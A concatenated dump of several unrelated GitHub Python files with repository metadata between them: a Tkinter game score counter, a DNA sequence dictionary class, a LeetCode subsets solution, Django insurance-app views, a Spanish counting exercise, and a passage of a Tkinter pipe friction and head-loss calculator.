#Checks if the game name is not void
return(self.getGameName() != TEXT_VOID)
def getFileName(self):
#Returns the file name, from the game name and the extension
gameName = self.getGameName()
fileName = gameName + FILE_EXTENSION
return fileName
def setGameName(self, name):
#Change the game name
global gameName
gameName = name
def getGameName(self):
#Return the game name
return gameName
def setGameText(self, name):
#Change the prefix text
global gameText
gameText = name
debug(PREFIX_TEXT_SET + self.getGameText())
def getGameText(self):
#Return the prefix text
return gameText
def createGame(self):
#Create the game file, and write the starting score in it
fileName = self.getFileName()
file = open(fileName,WRITE)
file.write(self.getGameText())
file.write("0" + SCORE_SEPARATOR + "0")
file.close()
self.updateGameScore()
def restart(self):
#Recreate the game file, erasing the previous score
if(self.isDefinedGameName()):
self.createGame()
self.updateShownMessage(SCORE_RESET)
debug(TEXT_SCORE_RESET)
else:
self.updateShownMessage(ERROR_NO_GAME_NAME)
def win(self):
#Adds one to the number of wins
if(self.isDefinedGameName()):
self.changeScore(WIN)
else:
self.updateShownMessage(ERROR_NO_GAME_NAME)
def lose(self):
#Adds one to the number of loses
if(self.isDefinedGameName()):
self.changeScore(LOSE)
else:
self.updateShownMessage(ERROR_NO_GAME_NAME)
def getScore(self, scoreLine):
scoreTab = readNumbers(scoreLine)
wins = scoreTab[0]
loses = scoreTab[1]
return wins, loses
def changeScore(self, win):
#Change the score of the game, saving it in the file, and then update it
#Positive : win ; Negative or null : loss
if(self.isDefinedGameName()):
if win > 1:
win = 1
if win < 0 :
win = 0
global gameName
fileName = self.getFileName()
if os.path.isfile(fileName): #Checks if the file exists
file = open(fileName,READ)
if(emptyFile(file)):
debug(fileName + TEXT_IS_EMPTY_FILE)
file.close()
self.createGame()
wins, loses = self.getScore(self.getGameScore())
wins += win
loses += 1 - win
if(win):
debug(GAME_WON_VICTORY)
self.updateShownMessage(GAME_WON_VICTORY)
else:
debug(GAME_LOST_DEFEAT)
self.updateShownMessage(GAME_LOST_DEFEAT)
file.close()
file = open(fileName,WRITE)
file.write(self.getGameText())
file.write(str(wins) + SCORE_SEPARATOR + str(loses))
file.close()
else: #If not, create the file
self.createGame()
self.updateGameScore()
debug(TEXT_GAME_SCORE + self.getGameScore())
else:
self.updateShownMessage(ERROR_NO_GAME_NAME)
def getGameScore(self):
#Get the game score from the file
fileName = self.getFileName()
if os.path.isfile(fileName):
file = open(fileName,READ)
wins, loses = self.getScore(file.read())
score = str(wins) + SCORE_SEPARATOR + str(loses)
file.close()
return score
else:
#Create the file
file = open(fileName,WRITE)
file.close()
#Should never get an infinite loop since the file is created right before the call
self.getGameScore()
def updateShownMessage(self, message):
self.gameMiscText.configure(text=message)
def updateGameScore(self):
#Updates the game score shown
self.gameScore.configure(text=self.getGameScore())
def changeGame(self):
#Change the game name, and if the file corresponding to that game does not exist, create it
enteredText = self.gameNameEntry.get()
if(enteredText == TEXT_VOID):
shownMessage = ERROR_ENTER_SOMETHING + " - " + ERROR_GAME_NAME_NOT_CHANGED
else:
self.setGameName(enteredText)
gameName = self.getGameName()
fileName = gameName + FILE_EXTENSION
if not(os.path.isfile(fileName)):
self.createGame()
gameScore = self.getGameScore()
self.updateGameScore()
debug(self.getGameName())
shownMessage = GAME_SELECTED + " : " + enteredText
self.updateShownMessage(shownMessage)
def changeText(self):
#Change the text put before the score
enteredText = self.gameTextEntry.get()
if(enteredText != TEXT_VOID):
self.setGameText(enteredText)
self.updateShownMessage(enteredText)
def __init__(self, parent):
tk.Frame.__init__(self, parent)
##Game
#Name
self.gameNamePrompt = tk.Label(self, text=ENTER_GAME_NAME)
self.gameNameEntry = tk.Entry(self, width=NB_CHAR)
self.gameNameButton = tk.Button(self, text=SET_GAME, command = self.changeGame)
#Prefix text
self.gameTextPrompt = tk.Label(self, text=ENTER_PREFIX_TEXT)
self.gameTextEntry = tk.Entry(self, width=NB_CHAR)
self.gameTextButton = tk.Button(self, text=SET_PREFIX_TEXT, command = self.changeText)
#Score
self.gameScorePrompt = tk.Label(self, text=TEXT_SCORE)
self.gameScore = tk.Label(self, text=TEXT_VOID, bg=WHITE, width=NB_CHAR)
#Misc Text
self.gameMiscText = tk.Label(self, text=TEXT_VOID)
#Buttons
self.restart = tk.Button(self, text=TEXT_RESTART, command = self.restart)
self.win = tk.Button(self, text=TEXT_WIN_BUTTON, command = self.win)
self.loss = tk.Button(self, text=TEXT_LOSS_BUTTON, command = self.lose)
#Checkbutton
self.debugCheck = tk.Checkbutton(self, text=TEXT_DEBUG_MODE, command = changeDebugMode)
#Sets the widgets
self.debugCheck.pack(side=BOTTOM)
self.gameNamePrompt.pack(side=TOP)
self.gameNameEntry.pack(side=TOP)
self.gameTextPrompt.pack(side=TOP)
self.gameTextEntry.pack(side=TOP)
self.gameScorePrompt.pack(side=TOP)
self.gameScore.pack(side=TOP)
self.gameMiscText.pack(side=TOP)
self.win.pack(side=LEFT)
self.loss.pack(side=LEFT)
self.restart.pack(side=LEFT)
self.gameNameButton.pack(side=RIGHT)
self.gameTextButton.pack(side=RIGHT)
# if this is run as a program (versus being imported),
# create a root window and an instance of our example,
# then start the event loop
if __name__ == "__main__":
root = tk.Tk()
root.title(WINDOW_NAME)
root.minsize(WINDOW_WIDTH, WINDOW_HEIGHT)
Counter(root).pack(fill="both")
root.mainloop() | LeSingeAffame/GameScoreCounter | counter.py | counter.py | py | 8,855 | python | en | code | 0 | github-code | 36 |
19031613616 | class Data:
dict={}
counter=0
counter2=0
counter3=0
index_dic=0
name_str=""
def __init__(self):
pass
def enter(self,key,value,flag):
for i in range(len(value)):
if value[i] not in 'ACTGactg':
if not flag:
return "not valid string"
else:
if value[i] not in 'ACTGactg' and (i>34 or i<32) :
return "not valid string"
Data.counter+=1
Data.index_dic+=1
Data.dict[(Data.index_dic,key)] = value
print(Data.dict)
return Data.counter
def find_name_or_id_by_id_or_name(self,id,ind):
z = list(Data.dict.keys())
for i in z:
if i[ind] == id:
if ind>0:
c = i[0]
else:
c = i[1]
return c
def name(self,arr,sum,name):
if len(arr) < sum:
Data.counter2 += 1
Data.name_str = "seq" + str(Data.counter2)
elif sum==5:
temp = arr[5]
if temp=='@@':
Data.counter3+=1
Data.name_str=str(name[1])+ "_s" +str(Data.counter3)
elif temp[0]=='@':
Data.name_str=temp[1::]
else:
Data.name_str = arr[2]
return Data.name_str
def update(self,key,value):
x = key
x1= x[1::]
if key[0]=='#':
x2=int(x1)
c=self.find_name_or_id_by_id_or_name(x2,0)
t1=c
t2=x2
elif key[0]=='@':
x2=x1
c = self.find_name_or_id_by_id_or_name(x2, 1)
t1=x2
t2=c
Data.dict[(t2,t1)] = value
def find(self,index):
arr=[]
if index[0]=='#':
x=index[1::]
g = [v for k, v in Data.dict.items() if k[0] == int(x)]
x=int(x)
c= self.find_name_or_id_by_id_or_name(x,0)
if index[0]=='@':
x = index[1::]
c=x
g = [v for k, v in Data.dict.items() if k[1] == x]
if g!=None:
Data.counter += 1
arr.append(Data.counter)
arr.append(c)
arr.append(g[0])
return arr
def delete(self,key):
k=self.find_name_or_id_by_id_or_name(int(key[1::]),0)
del Data.dict[(int(key[1::]),k)]
return Data.dict
| RivkiZolti/DNA | Data.py | Data.py | py | 2,511 | python | en | code | 3 | github-code | 36 |
28924212361 | from typing import List
"""
method 1 : iterative call without for loop
"""
class Solution:
def subsets(self, nums: List[int]) -> List[List[int]]:
results = []
length = len(nums)
def make_dfs_subset(subset, cur_idx):
if cur_idx == length :
print("list:", subset)
results.append(list(subset))
return
# Include current cur_idx
make_dfs_subset(subset, cur_idx+1)
#Exclude current cur_idx
subset.append(nums[cur_idx])
make_dfs_subset(subset, cur_idx+1)
subset.remove(nums[cur_idx])
make_dfs_subset([],0)
return results
"""
idx = 0
"""
[1]
s = Solution()
print(s.subsets([1,2,3]))
| GuSangmo/BOJ_practice | Leetcode/78.subsets.py | 78.subsets.py | py | 766 | python | en | code | 0 | github-code | 36 |
25293683614 | from django.shortcuts import render, redirect, reverse
from . import forms, models
from django.db.models import Sum
from django.contrib.auth.models import Group
from django.http import HttpResponseRedirect
from django.contrib.auth.decorators import login_required, user_passes_test
from django.conf import settings
from django.db.models import Q
from insurance import models as CMODEL
from insurance import forms as CFORM
from django.contrib.auth.models import User
def customerclick_view(request):
if request.user.is_authenticated:
return HttpResponseRedirect('afterlogin')
return render(request, 'customer/customerclick.html')
def customer_signup_view(request):
userForm = forms.CustomerUserForm()
customerForm = forms.CustomerForm()
mydict = {'userForm': userForm, 'customerForm': customerForm}
if request.method == 'POST':
userForm = forms.CustomerUserForm(request.POST)
customerForm = forms.CustomerForm(request.POST, request.FILES)
if userForm.is_valid() and customerForm.is_valid():
user = userForm.save()
user.set_password(user.password)
user.save()
customer = customerForm.save(commit=False)
customer.user = user
customer.save()
my_customer_group = Group.objects.get_or_create(name='CUSTOMER')
my_customer_group[0].user_set.add(user)
return HttpResponseRedirect('customerlogin')
return render(request, 'customer/customersignup.html', context=mydict)
def is_customer(user):
return user.groups.filter(name='CUSTOMER').exists()
@login_required(login_url='customerlogin')
def customer_dashboard_view(request):
dict = {
'customer': models.Customer.objects.get(user_id=request.user.id),
'available_policy': CMODEL.Policy.objects.all().count(),
'applied_policy': CMODEL.PolicyRecord.objects.all().filter(status='Approved',
customer=models.Customer.objects.get(user_id=request.user.id)).count(),
'total_category': CMODEL.Category.objects.all().count(),
'total_question': CMODEL.Question.objects.all().filter(
customer=models.Customer.objects.get(user_id=request.user.id)).count(),
'total_events': CMODEL.InsuranceEventRecord.objects.all().filter(
customer=models.Customer.objects.get(user_id=request.user.id)).count(),
}
return render(request, 'customer/customer_dashboard.html', context=dict)
def apply_policy_view(request):
customer = models.Customer.objects.get(user_id=request.user.id)
policies = CMODEL.Policy.objects.all().order_by('category', 'sum_assurance')
return render(request, 'customer/apply_policy.html', {'policies': policies, 'customer': customer})
def apply_view(request, pk):
customer = models.Customer.objects.get(user_id=request.user.id)
policy = CMODEL.Policy.objects.get(id=pk)
policyrecord = CMODEL.PolicyRecord()
policyrecord.Policy = policy
policyrecord.customer = customer
policyrecord.save()
return redirect('apply-policy')
def my_products_view(request):
customer = models.Customer.objects.get(user_id=request.user.id)
policies = CMODEL.PolicyRecord.objects.all().filter(customer=customer, status='Approved')
total_sum = CMODEL.PolicyRecord.objects.filter(customer=customer).aggregate(sum=Sum('premium'))
total_sum_number = total_sum['sum']
return render(request, 'customer/myproducts.html', {'policies': policies, 'customer': customer, 'totalsum': total_sum_number})
def ask_question_view(request):
customer = models.Customer.objects.get(user_id=request.user.id)
questionForm = CFORM.QuestionForm()
if request.method == 'POST':
questionForm = CFORM.QuestionForm(request.POST)
if questionForm.is_valid():
question = questionForm.save(commit=False)
question.customer = customer
question.save()
return redirect('question-history')
return render(request, 'customer/ask_question.html', {'questionForm': questionForm, 'customer': customer})
def question_history_view(request):
customer = models.Customer.objects.get(user_id=request.user.id)
questions = CMODEL.Question.objects.all().filter(customer=customer)
return render(request, 'customer/question_history.html', {'questions': questions, 'customer': customer})
# PŘÍDAT TŘÍDA INS EVENTS
def customer_event_view(request):
customer = models.Customer.objects.get(user_id=request.user.id)
events = CMODEL.InsuranceEventRecord.objects.all().filter(customer=customer).order_by('creation_date')
return render(request, 'customer/customer_view_event.html', {'events': events, 'customer': customer})
def customer_event_add(request):
customer = models.Customer.objects.get(user_id=request.user.id)
eventForm = CFORM.EventForm()
if request.method == 'POST':
eventForm = CFORM.EventForm(request.POST)
if eventForm.is_valid():
question = eventForm.save(commit=False)
question.customer = customer
question.save()
return redirect('customer-event-views')
return render(request, 'customer/customer_event_add.html', {'eventForm': eventForm, 'customer': customer}) | LiborSehnal/RichInsure | customer/views.py | views.py | py | 5,259 | python | en | code | 0 | github-code | 36 |
34097359425 | '''6. Calcular el máximo de números positivos introducidos por
teclado, sabiendo que metemos números hasta que
introduzcamos uno negativo. El negativo no cuenta.'''
number=int(input('Ingrese un numero positivo y 0 para terminar: '))
cont=0
while number!=0:
if number>0:
cont+=1
number=int(input('Ingrese un numero positivo y 0 para terminar: '))
print('Usted ingreso',cont,'positivos.') | NOXDION/ADSO | 2T/3 Ciclos M3/6.CalcularMaximosPositivos.py | 6.CalcularMaximosPositivos.py | py | 420 | python | es | code | 0 | github-code | 36 |
30314652001 | # -*- coding: utf-8 -*-
"""
Created by Vincenzo Sammartano
email: v.sammartano@gmail.com
Last Update: Added the formulation section
"""
import numpy as num
import tkinter as tk
from tkinter import messagebox
from tkinter import font
import webbrowser
##########################################
#Constants
Rf = 287.058 # Universal Constant of Gases [J/(Kg K)]
pAtm = 101325 # [Pa] atmospheric pressure
g = 9.806 # [m/s2] gravitational accelaration
##########################################
#List of fluids
flu_opt = ['Air','Water']
##########################################
#Tkinter Window
root = tk.Tk()
root.geometry("800x770+100+50")
root.title("Skin Friction & Head Losses")
root.resizable(width=False, height=False)
#root.iconbitmap('roughness.ico')
##########################################
#Fonts
f_H12B = font.Font(family='Helvetica', size=12, weight='bold')
f_H12 = font.Font(family='Helvetica', size=12, weight='normal')
f_H11 = font.Font(family='Helvetica', size=11, weight='bold')
f_H10 = font.Font(family='Helvetica', size=10, weight='bold')
f_H08 = font.Font(family='Helvetica', size=8, weight='normal')
f_Ref = font.Font(family='Helvetica', size=12, weight='normal', underline=1)
font.families()
####Frames texts
text0 = "Fluid Parameters"
text1 = "Duct Geometry"
text2 = "Cross Section Definition"
text3 = "Results"
text4 = "Formulation"
#main Frames
left_side = tk.Frame(root,width=500)
left_side.grid(row=0,column=0,rowspan=2, sticky="nsew")
right_side = tk.Frame(root,width=350)
right_side.grid(row=0,column=1,rowspan=2, sticky="nsew")
bottom_frame = tk.Frame(root)
bottom_frame.grid(row=2, column=0, columnspan=2, sticky="ew")
#Subframes - "Fluid Parameters"
frame00 = tk.LabelFrame(left_side,text=text0,width=450,height=150,font=f_H12B)
frame00.grid(row=0, column=0,padx=15,pady=10,ipadx=20,ipady=5)
frame00.config(borderwidth=4)
#Subframes - "Duct Geometry"
frame01 = tk.LabelFrame(left_side,text=text1,width=450,height=150,font=f_H12B)
frame01.grid(row=1, column=0,padx=15,pady=5,ipadx=30,ipady=5)
frame01.config(borderwidth=4)
#Subframes - "Cross Section Definition"
frame02 = tk.LabelFrame(left_side,text=text2,width=450,height=150,font=f_H12B)
frame02.grid(row=2,column=0,padx=15,pady=5,ipadx=5,ipady=6)
frame02.config(borderwidth=4)
#Subframes - "Results"
frame03 = tk.LabelFrame(right_side,text=text3,width=350,font=f_H12B)
frame03.grid(row=0,column=0,padx=15,pady=10,ipadx=4,ipady=4)
frame03.config(borderwidth=4)
#Subframes - "Formulation"
frame04 = tk.LabelFrame(bottom_frame,text=text4,width=50,font=f_H12B)
frame04.pack(padx=5,pady=5)
frame04.config(borderwidth=4)
#Subframes - "Buttons"
frame05 = tk.LabelFrame(bottom_frame,text="",width=50,font=f_H12B)
frame05.pack(padx=5,pady=5)
frame05.config(borderwidth=4)
##########################################
##Functions
def fluid():
Fp = []
T = float(T_.get())
t = T + 273.17 # Kelvin
F = f_sel.get()
if F == "Air":
#Air
rot = pAtm/(Rf*t) #Density as function of temperature in Kelvin [Kg/mc]
gamma_t = rot * g #specific weight at t°C
#Sutherland Equation
ba = 1.458*10**(-6)
sa = 110.4 #Kelvin
mi = ba * (t**1.5)/(t+sa) #Dinamic Viscosity Pa s = kg m^-1 s^-1
ni = mi/rot #Cinematic Viscosity m2·s-1
FpA = [rot,gamma_t,mi,ni]
Fp = FpA
if F == "Water":
#Water - Kell formulation
ro = 999.83952
At = 1 + (16.879850*10**-3)*T #constant to be used in the Kell formula
#rot is the water density as function of temperature [Kg/e]
rot = (ro + (16.945176*T) - (7.987040*10**-3)*(T**2.0) -
+(46.17046*10**-6)*(T**3.0) + (105.56302*10**-9)*(T**4.0)-
+(280.54253*10**-12)*(T**5.0))/At
gamma_t = rot*g #specific weight at t°C
# 0<t<370 Celsius
mi = 2.414*(10**-5)*10**(247.8/(t-140)) #Dinamic Viscosity Pa s = kg m^-1 s^-1
ni = mi/rot #Kinetic Viscosity m2·s-1
FpW = [rot,gamma_t,mi,ni]
Fp = FpW
return Fp
def UFFF1(EPS,dc,Re,V):
lamb_= 0
ff = fluid()
L = float(L_.get())
#ColebrokWhite Equation
#First step - Hyp. fully turbulent flow
turbTerm = EPS/(3.71*dc) #turbulent term
lambInf = 0.25 * (num.log10(turbTerm)**2)**-1
lamI = lambInf #First value for the friction coefficient
errLam = 999
tol = 1e-14
its = 0
while (errLam > tol):
lamTerm = 2.51/(Re*(lamI**0.5))
lamII = 0.25 * (num.log10(turbTerm + lamTerm)**2)**-1
errLam = num.abs((lamI - lamII)/lamI)
lamI = lamII
its += 1
lamb_ = lamI
LAMB = lamb_
####DarcyWeisbach Equation
J = (LAMB/dc)* V**2/(2*g) #Specific Losses in m/m
HeadLoss = J*L #Total Losses in m
HeadLossPa = HeadLoss * ff[1] #Total losses in Pa
global RES
RES = [dc,Re,LAMB,J,HeadLoss,HeadLossPa]
printOut()
def UFFF2(EPS,dc,Re,V):
#A New Six Parameter Model to Estimate the Friction Factor
ff = fluid()
L = float(L_.get())
l1 = 0.02 #residual stress from laminar to turbulent transition
t1 = 3000 #Reynolds is number at first transition
l2 = num.abs(l1-(1/(-2*num.log10(EPS/(3.7065*dc))))**2)
t2 = (0.77505/(EPS/dc)**2) - (10.984/(EPS/dc)) + 7953.8
y0 = 64/Re #laminar flow
y1 = l1 / (1 + num.e**((t1-Re)/100))
y2 = l2 / (1 + num.e**(((t2-Re)/600)*EPS/dc))
LAMB = y0 + y1 + y2
####DarcyWeisbach Equation
J = (LAMB/dc)* V**2/(2*g) #Specific Losses in m/m
HeadLoss = J*L #Total Losses in m
HeadLossPa = HeadLoss * ff[1] #Total losses in Pa
global RES
RES = [dc,Re,LAMB,J,HeadLoss,HeadLossPa]
printOut()
def printOut():
ff = fluid() #[rot,gamma_t,mi,ni]
labflu = ["{:4.3f}".format(ff[0]),"{:4.3f}".format(ff[1]),"{:1.3e}".format(ff[2]),"{:1.3e}".format(ff[3])]
labels = ["{:6.3f}".format(RES[0]),"{:8.0f}".format(RES[1]),"{:6.7f}".format(RES[2]),"{:6.7f}".format(RES[3]),"{:6.7f}".format(RES[4]),
"{:3.4e}".format(RES[5])]
for i,l in enumerate(labflu):
tk.Label(frame03,text=l, bg="white",width=15,font=f_H12,anchor='center',borderwidth=2, relief="groove").grid(row=i,column=1,padx=3)
for i,r in enumerate(labels):
tk.Label(frame03,text=r, bg="white",width=15,font=f_H12,anchor='center',borderwidth=2, relief="groove").grid(row=i+4,column=1,padx=3)
def calC():
fp = fluid()
ni = fp[3]
modF_ = modF.get()
EPS = float(eps_.get())
D = float(D_.get())
#Velocity selection
if modF_ == 1:
V0 = float(V0_.get())
if V0 <= 0:
messagebox.showwarning("Warning","The velocity has to be greater than 0!")
else:
if EPS<=0:
messagebox.showwarning("Warning","The absolute roughness has to be greater than 0!")
if (D <= 0):
messagebox.showwarning("Warning","The diameter has to be greater than 0!")
else:
dc = D
Ac = 0.25 * num.pi * D**2
Re = V0 * (dc/ni)
if modForm.get()==1: UFFF1(EPS,dc,Re,V0)
elif modForm.get()==2: UFFF2(EPS,dc,Re,V0)
#Flow rate
if modF_ == 2:
Q0 = float(Q0_.get())
if Q0 <= 0:
messagebox.showwarning("Warning","The flow rate has to be greater than 0!")
else:
if EPS<=0:
messagebox.showwarning("Warning","The absolute roughness has to be greater than 0!")
if D<=0:
messagebox.showwarning("Warning","The diameter has to be greater than 0!")
else:
dc = D
Ac = 0.25 * num.pi * D**2
V0 = Q0/Ac
Re = V0 * (dc/ni)
if modForm.get()==1: UFFF1(EPS,dc,Re,V0)
elif modForm.get()==2: UFFF2(EPS,dc,Re,V0)
def calR():
fp = fluid()
ni = fp[3]
modF_ = modF.get()
EPS = float(eps_.get())
sA = float(W_.get())
sB = float(H_.get())
if modF_ == 1:
V0 = float(V0_.get())
if V0 <= 0:
messagebox.showwarning("Warning","The velocity has to be greater than 0!")
else:
if EPS==0:
messagebox.showwarning("Warning","The absolute roughness has to be greater than 0!")
else:
Ar = sA * sB # area of the section
if Ar<=0:
messagebox.showwarning("Warning","The width and height have be greater than 0!")
else:
Pr = 2 * (sA + sB) # perimeter of the section
dc = 4 * (Ar/Pr) #hydraulic diameter
Re = V0 * (dc/ni)
if modForm.get()==1: UFFF1(EPS,dc,Re,V0)
elif modForm.get()==2: UFFF2(EPS,dc,Re,V0)
if modF_ == 2:
Q0 = float(Q0_.get())
if Q0 <= 0:
messagebox.showwarning("Warning","The flow rate has to be greater than 0!")
else:
if EPS==0:
messagebox.showwarning("Warning","The absolute roughness has to be greater than 0!")
else:
Ar = sA * sB # area of the section
if Ar<=0:
messagebox.showwarning("Warning","The width and height have be greater than 0!")
else:
V0 = Q0/Ar
Pr = 2 * (sA + sB) # perimeter of the section
dc = 4 * (Ar/Pr) #hydraulic diameter
Re = V0 * (dc/ni)
if modForm.get()==1: UFFF1(EPS,dc,Re,V0)
elif modForm.get()==2: UFFF2(EPS,dc,Re,V0)
def calGen():
fp = fluid()#
ni = fp[3]
modF_ = modF.get()
EPS = float(eps_.get())
Ar = float(A_.get())
Pr = float(P_.get())
if modF_ == 1:
V0 = float(V0_.get())
if V0 <= 0:
messagebox.showwarning("Warning","The velocity has to be greater than 0!")
else:
if EPS==0:
messagebox.showwarning("Warning","The absolute roughness has to be greater than 0!")
else:
if Ar<=0:
messagebox.showwarning("Warning","Please, do check Area and Perimeter of the section!")
else:
dc = 4 * (Ar/Pr) #hydraulic diameter
Re =V0*(dc/ni)
if modForm.get()==1: UFFF1(EPS,dc,Re,V0)
elif modForm.get()==2: UFFF2(EPS,dc,Re,V0)
if modF_ == 2:
Q0 = float(Q0_.get())
if Q0 <= 0:
messagebox.showwarning("Warning","The flow rate has to be greater than 0!")
else:
if EPS==0:
messagebox.showwarning("Warning","The absolute roughness has to be greater than 0!")
else:
V0 = Q0/Ar
if Ar<=0:
messagebox.showwarning("Warning","Please, do check Area and Perimeter of the section!")
else:
dc = 4 * (Ar/Pr) #hydraulic diameter
V0 = Q0/Ar
Re =V0*(dc/ni)
if modForm.get()==1: UFFF1(EPS,dc,Re,V0)
elif modForm.get()==2: UFFF2(EPS,dc,Re,V0)
def CAL():
modF_ = modF.get()
sec_ = sec.get()
F_ = f_sel.get()
if F_ not in flu_opt:
messagebox.showwarning("Warning","Select the Fluid!")
if modF_ == 0:
messagebox.showwarning("Warning","You must select velocity\n or flow rate!")
if sec_ == 1:
calC()
elif sec_ == 2:
calR()
elif sec_ == 3:
calGen()
elif sec_ == 0:
messagebox.showwarning("Warning","You must select the kind of section!")
def ACT():
if sec.get()==1:
d.config(state='normal')
d.delete(0,'end')
d.insert('end',0)
w.delete(0,'end')
w.insert('end',0)
w.config(state='disabled')
h.delete(0,'end')
h.insert('end',0)
h.config(state='disabled')
p.delete(0,'end')
p.insert('end',0)
p.config(state='disabled')
a.delete(0,'end')
a.insert('end',0)
a.config(state='disabled')
dd.config(fg='black')
ddu.config(fg='black')
ww.config(fg='gray')
wwu.config(fg='gray')
hh.config(fg='gray')
hhu.config(fg='gray')
AA.config(fg='gray')
AAU.config(fg='gray')
PP.config(fg='gray')
PPU.config(fg='gray')
if sec.get()==2:
w.config(state='normal')
h.config(state='normal')
w.delete(0,'end')
w.insert('end',0)
h.delete(0,'end')
h.insert('end',0)
d.delete(0,'end')
d.insert('end',0)
d.config(state='disabled')
a.delete(0,'end')
a.insert('end',0)
a.config(state='disabled')
p.delete(0,'end')
p.insert('end',0)
p.config(state='disabled')
ww.config(fg='black')
wwu.config(fg='black')
hh.config(fg='black')
hhu.config(fg='black')
d.config(state='disabled')
dd.config(fg='gray')
ddu.config(fg='gray')
a.config(state='disabled')
AA.config(fg='gray')
AAU.config(fg='gray')
p.config(state='disabled')
PP.config(fg='gray')
PPU.config(fg='gray')
if sec.get()==3:
a.config(state='normal')
p.config(state='normal')
a.delete(0,'end')
a.insert('end',0)
p.delete(0,'end')
p.insert('end',0)
d.delete(0,'end')
d.insert('end',0)
d.config(state='disabled')
w.delete(0,'end')
w.insert('end',0)
w.config(state='disabled')
h.delete(0,'end')
h.insert('end',0)
h.config(state='disabled')
PP.config(fg='black')
PPU.config(fg='black')
AA.config(fg='black')
AAU.config(fg='black')
dd.config(fg='gray')
ddu.config(fg='gray')
ww.config(fg='gray')
wwu.config(fg='gray')
hh.config(fg='gray')
hhu.config(fg='gray')
def ACTF():
if modF.get()==1:
v0.config(state='normal')
Q0.delete(0,'end')
Q0.insert('end',0)
Q0.config(state='disabled')
v0.delete(0,'end')
v0.insert('end',0)
Q0.config(fg='black')
l2.config(fg='black')
l2_1.config(fg='black')
f3.config(fg='gray')
f3_1.config(fg='gray')
if modF.get()==2:
Q0.config(state='normal')
v0.delete(0,'end')
v0.insert('end',0)
v0.config(state='disabled')
Q0.delete(0,'end')
Q0.insert('end',0)
v0.config(fg='black')
f3.config(fg='black')
f3_1.config(fg='black')
l2.config(fg='gray')
l2_1.config(fg='gray')
def ACTF2():
if modForm.get() == 1:
for1.config(state='normal')
for1.config(fg='black')
for2.config(fg='gray')
if modForm.get() == 2:
for2.config(state='normal')
for1.config(fg='gray')
for2.config(fg='black')
#Define a callback function
def callback(url):
webbrowser.open_new_tab(url)
def table():
choices = """
- Flexible Rubber: 0.3 - 4;\n
- New cast iron: 0.25 - 0.8;\n
- Steel commercial pipe: 0.045 - 0.09;\n
- Flexible Rubber Tubing Smooth: 0.006 - 0.07;\n
- Stainless steel: 0.0015;\n
- PVC and Plastic: 0.0015 - 0.007;\n
- Asphalted Cast Iron: 0.1 - 1;\n
- Cast Iron (new): 0.25;\n
- Cast Iron (old): 1.00;\n
- Galvanized Iron: 0.025 - 0.150;\n
- Wood Stave: 0.180 - 0.91;\n
- Wood Stave (used): 0.250 - 1.0;\n
- Smooth Cement: 0.50;\n
- Concrete – Very Smooth: 0.025 - 0.2;\n
- Concrete – Fine (Floated, Brushed): 0.200 - 0.8;\n
- Concrete – Rough, Form Marks: 0.8 - 3;\n
- Riveted Steel: 0.91-9.1;\n
- Water Mains with Tuberculations: 1.2;\n
- Brickwork, Mature Foul Sewers: 3;\n
"""
tit = "Table of absolute roughness"
global root2, fin2
root2 = tk.Tk()
root2.title('Roughness Values')
root2.geometry("450x550+900+50")
root2.resizable(width=False, height=False)
root2.iconbitmap('roughness.ico')
label1 = tk.Label(root2,text=tit,font=('Helvetica', 14, 'normal'))
label1.pack()
T = tk.Text(root2, height=25, width=40,font=('Helvetica', 12, 'normal'))
T.pack()
T.config(state='normal')
T.insert(tk.END, choices)
T.config(state='disabled')
fin2 = 1
tk.Button(root2,text="EXIT",command=EX,font=('Helvetica', 12, 'normal','bold'),height = 1, width = 10).pack(pady=10)
root2.mainloop()
def EX():
#root.destroy()
try:
fin2
except NameError:
var_exists = False
if var_exists: print("Window does not exist")
else:
root2.destroy()
def EX_out():
root.destroy()
# ##end of Functions
# ##########################################
###########Main
#INPUT
#fluid selection
f_sel = tk.StringVar()
f_sel.set(flu_opt[0])
f1 = tk.OptionMenu(frame00,f_sel, *flu_opt)
f1.config(width=8,font=f_H11)
f1.grid(row=0,column=1,sticky='W',pady=5)
tk.Label(frame00,text="Choose fluid",font=f_H12).grid(row=0,column=0,padx=15,sticky="W")
#temperature selection
tk.Label(frame00,text="Temperature",font=f_H12).grid(row=1,column=0,padx=15,pady=5,sticky='W')
tk.Label(frame00,text="[°C]",font=f_H12).grid(row=1, column=2,pady=5)
T_ = tk.StringVar()
t1 = tk.Entry(frame00,textvariable=T_ , width=6, justify="center",font=f_H12)
t1.grid(row = 1, column=1,pady=5)
t1.insert("end", 20)
#Method Velocity or Flow rate
modF = tk.IntVar()
l2 = tk.Radiobutton(frame00,text="Mean Velocity",padx = 10,variable=modF,value=1,font=f_H12)
l2.grid(row=2,column=0,sticky='W')
l2.configure(command=ACTF, indicatoron=1)
l2_1 = tk.Label(frame00,text="[m/s]",padx = 5,font=f_H12)
l2_1.grid(row=2,column=2,pady=5)
l2.select()
V0_ = tk.StringVar()
v0 = tk.Entry(frame00,textvariable=V0_ , width=6,justify="center",font=f_H12)
v0.grid(row=2,column=1,pady=5)
v0.insert('end',0)
v0.configure(state='normal')
f3 = tk.Radiobutton(frame00,text="Flow Rate",padx = 10,variable=modF,value=2,font=f_H12)
f3.grid(row=3,column=0,sticky='W')
f3.configure(command=ACTF)
f3_1 = tk.Label(frame00,text="[m\xb3/s]", padx = 5,font=f_H12)
f3_1.grid(row=3,column=2,pady=5)
f3.config(fg='gray')
f3_1.config(fg='gray')
Q0_ = tk.StringVar()
Q0 = tk.Entry(frame00,textvariable=Q0_ , width=6, justify="center",font=f_H12)
Q0.grid(row=3,column=1,pady=5)
Q0.insert('end',0)
Q0.configure(state='disabled')
#####Geometry settings
#Length
L0 = tk.Label(frame01,text="Duct Length",font=f_H12)
L0.grid(row = 0, column = 0,padx=10,pady =5)
L_ = tk.StringVar()
L1 = tk.Entry(frame01,textvariable = L_ , width = 6, justify="center",font=f_H12)
L1.grid(row = 0 , column=1,padx=10,pady=5)
L1.insert("end",1)
tk.Label(frame01,text="[m]",font=f_H12,justify="right").grid(row=0, column=2,padx=10,pady = 5)
# #Epsilon selection
tk.Label(frame01,text="Wall roughness",font=f_H12).grid(row=1,column=0,padx=10,pady = 5)
tk.Label(frame01,text="[mm]",font=f_H12).grid(row=1,column=2,padx=10,pady = 5)
eps_ = tk.StringVar()
eps = tk.Entry(frame01,textvariable=eps_,width=8,justify="center",font=f_H12)
eps.grid(row=1,column=1,padx=10,pady = 5)
eps.insert("end", 0.0015)
##Cross Section Geometry
sec = tk.IntVar()
s1 = tk.Radiobutton(frame02,text="Circular Section", padx=10,variable=sec,value=1,indicatoron=1)
